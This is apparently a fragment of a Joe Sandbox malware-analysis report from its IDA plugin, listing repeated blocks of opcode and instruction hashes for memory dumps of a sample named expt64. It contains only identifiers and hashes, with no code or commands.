                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_22f0000_expt64.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                                                                                                          • Instruction ID: 683ccce210fadf61b8d5dba54af251d5355187583a5bf8a5d55e1d9825b6a3bd
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7811C233A051F04EC3168D3C8441565BFA70E93635B2983D9E4F89B2D2C6238D8E8B64
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_22f0000_expt64.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 875c8872e886c9a6df03e5378ed413a697544a5c3f170caf45db0f60b7c9a7b6
                                                                                                                                                                                                                          • Instruction ID: d0caf6203e707d9a12d1894ae59e0a68fd4423cbebccc1c33a7baa35a92a47f5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 875c8872e886c9a6df03e5378ed413a697544a5c3f170caf45db0f60b7c9a7b6
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 260171F171034287DB34AE6488C0B37F6BAAF84708F19483CD94957245EB75E809CAA5
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_22f0000_expt64.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 754b1fdeed7a772bc9ce9a585551eee55588dd48648c9e799ac489748c070118
                                                                                                                                                                                                                          • Instruction ID: dca9cbd2046f5bf62ceb4a97dc1255a8a58babc5efaadf73cc354b1318f4c903
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 754b1fdeed7a772bc9ce9a585551eee55588dd48648c9e799ac489748c070118
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9711E53511831C9FC220AB54DD4586BB7AAFFDA319F140428D6C457230E332E968CB95
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_22f0000_expt64.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 2194485ee7e9aaef04238bd0955ff54d561839f337ec04b75cafd92edaf81f56
                                                                                                                                                                                                                          • Instruction ID: 02ddeb635e61673fd7c0dfd73bcd2aa7c3441928628d65e4c72f9fe90894170f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2194485ee7e9aaef04238bd0955ff54d561839f337ec04b75cafd92edaf81f56
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 76115632A647428FD7744FAAC410371F7F1AB8A21872CC92C95D39B719DB749401CF45
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_22f0000_expt64.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 3d668db2a39d0c58336a571a08f283b7c17e072167910f4d6009b41effca224b
                                                                                                                                                                                                                          • Instruction ID: b29d5f6a40860a0778b495f4a9ebdf8f8492d10551f62d2f35c9b35a6fd4cf96
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3d668db2a39d0c58336a571a08f283b7c17e072167910f4d6009b41effca224b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9901D4A4624422A6D72D9F38D51147AB693FFD9300714B63E8082C3AA9EF3886208748
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_22f0000_expt64.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 8473c85886807e6bc29514394763af4b2039333101efc46837769cd7ff94ce77
                                                                                                                                                                                                                          • Instruction ID: 922f550c7d5de391a7eee9aaa3178ae58a65e5b9aa97d02e7f0061f25baac2ad
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8473c85886807e6bc29514394763af4b2039333101efc46837769cd7ff94ce77
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 87019232A192109BE7288F14CD0073AB3E1EB5AB04F0A556CE889A73A5D331DD15CB49
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_22f0000_expt64.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 479373be1e121a7faa6e3bd242e7a90329f0f24191153999f53bc99e68dfe5f2
                                                                                                                                                                                                                          • Instruction ID: f0d96a7729b09c623e3d412637276cbc49dffe5312b6aa939042d4754d5111ac
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 479373be1e121a7faa6e3bd242e7a90329f0f24191153999f53bc99e68dfe5f2
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0D11A331A28320DBD7248F10C98177AF3B2FF95704F41952CED8527261D3359C418796
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_22f0000_expt64.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 3a988fe037fd612b4c48d6a54066d194f5add051878c06eb8d1dc27ab7f058bd
                                                                                                                                                                                                                          • Instruction ID: 13d243925fdfc761482a32728078978c03276153ddb5636bc01a2b6b5791b192
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3a988fe037fd612b4c48d6a54066d194f5add051878c06eb8d1dc27ab7f058bd
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 93118B359183208BCB28CF24C84037AB3F0BF4AB05F4A666DEC89AB390D7309E05C749
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_22f0000_expt64.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 7e0eb08d5b3252200ba858cb0dbd191acbb107141d47f76ae1cf0deae4e99271
                                                                                                                                                                                                                          • Instruction ID: 6b1dbd3feabdfcf029a11b98956076a72cb5bd1db8864535e45cf3428567890e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7e0eb08d5b3252200ba858cb0dbd191acbb107141d47f76ae1cf0deae4e99271
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4E01FD36A187158FD750AF28DC003AAB3E0AB84320F0A543D8AD5E3761EB78E8009684
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_22f0000_expt64.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: eb3be7d817d82fdefde71abed4f6488080adf443fa0ae3ad428bc58e6f56e05f
                                                                                                                                                                                                                          • Instruction ID: 6ba7a0c3736de13d7cd5de189965f422c0b7c3d6264a2e887b28b9656a69bd6a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: eb3be7d817d82fdefde71abed4f6488080adf443fa0ae3ad428bc58e6f56e05f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8901D636D15A604BD319CF38CC1039673E6AB86305F098538DA45E7798DB7A98508684
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_22f0000_expt64.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 2f432f6d4d57ddd5edf10f0a55197208a6667e030cc273150dee4b63bd6a15e3
                                                                                                                                                                                                                          • Instruction ID: 35f6f6cb44cc0fcded02d2f2cbb4f2e6e8ceb01395e304c4d4ed19b61d9818c7
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2f432f6d4d57ddd5edf10f0a55197208a6667e030cc273150dee4b63bd6a15e3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B601FB34A20109EFCB54DF94C284AACF7B2FB44314F2082A9E9059B399CB31AF81DB40
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_22f0000_expt64.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 4fadea260efd188fa37194c97d808d0f8342bb959896949141ba2e03d0f00f63
                                                                                                                                                                                                                          • Instruction ID: d01f651dfe7ebf7cc472ea8873aae9f3ac24b3328c4e7ea08f173b6033e52a34
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4fadea260efd188fa37194c97d808d0f8342bb959896949141ba2e03d0f00f63
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4DF0EC36AE6B258AD3502F34C8003B5F3A1FFC6305F0A5438C8C453691DAB96645D3C5
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_22f0000_expt64.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 41c64a27492023317bfe340e89d84a1a068089ead8bdec49ccc3fa352ce3cf3e
                                                                                                                                                                                                                          • Instruction ID: 887eeff1e35ccd39ab6b6085a2898952bf585969c79b85d1816934a30a1eee36
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 41c64a27492023317bfe340e89d84a1a068089ead8bdec49ccc3fa352ce3cf3e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F5F0EC32AE6B158ED3506F34C8003B5F3A2FFC2315F0A5438C8C4132D1DAB96545D385
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_22f0000_expt64.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 7bb2be1f52fb94bbc8aa53112f6c7e48271192bd10a980babc9053e326529e98
                                                                                                                                                                                                                          • Instruction ID: bccbc8219c2a1f690ac272bdc469585e9f9fb0a7299531a63a2b503f464aaebe
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7bb2be1f52fb94bbc8aa53112f6c7e48271192bd10a980babc9053e326529e98
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C4F0A737D405304BE7148A18CD1039573A19FCA311F079570CC4CBB696D67A5C058784
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_22f0000_expt64.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: c8d4ec5a897944de9ccb49b367769b78272b2d828bddb0ac0c15959bc6145835
                                                                                                                                                                                                                          • Instruction ID: bae0f17c499c8538587101fc79fe5062e7aba0fbc5f9df691d55fbaf32910c34
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c8d4ec5a897944de9ccb49b367769b78272b2d828bddb0ac0c15959bc6145835
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 54D01223D454344BC7208D6CC8811F9B2B65B95211F4553668451B7589D969D81A4684
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_22f0000_expt64.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: a7801a348dfb445b8529d839e4b4c2f9d4d14aedce63be36fe840cd4680e2497
                                                                                                                                                                                                                          • Instruction ID: e3989d077634a48908df7aa544cddc51b682a82f7388479aad2c488c47eab6c3
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a7801a348dfb445b8529d839e4b4c2f9d4d14aedce63be36fe840cd4680e2497
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 79D01235E553428FDB05CF68E4C177BB7719B5B204F58582CC152F3352C220E416861C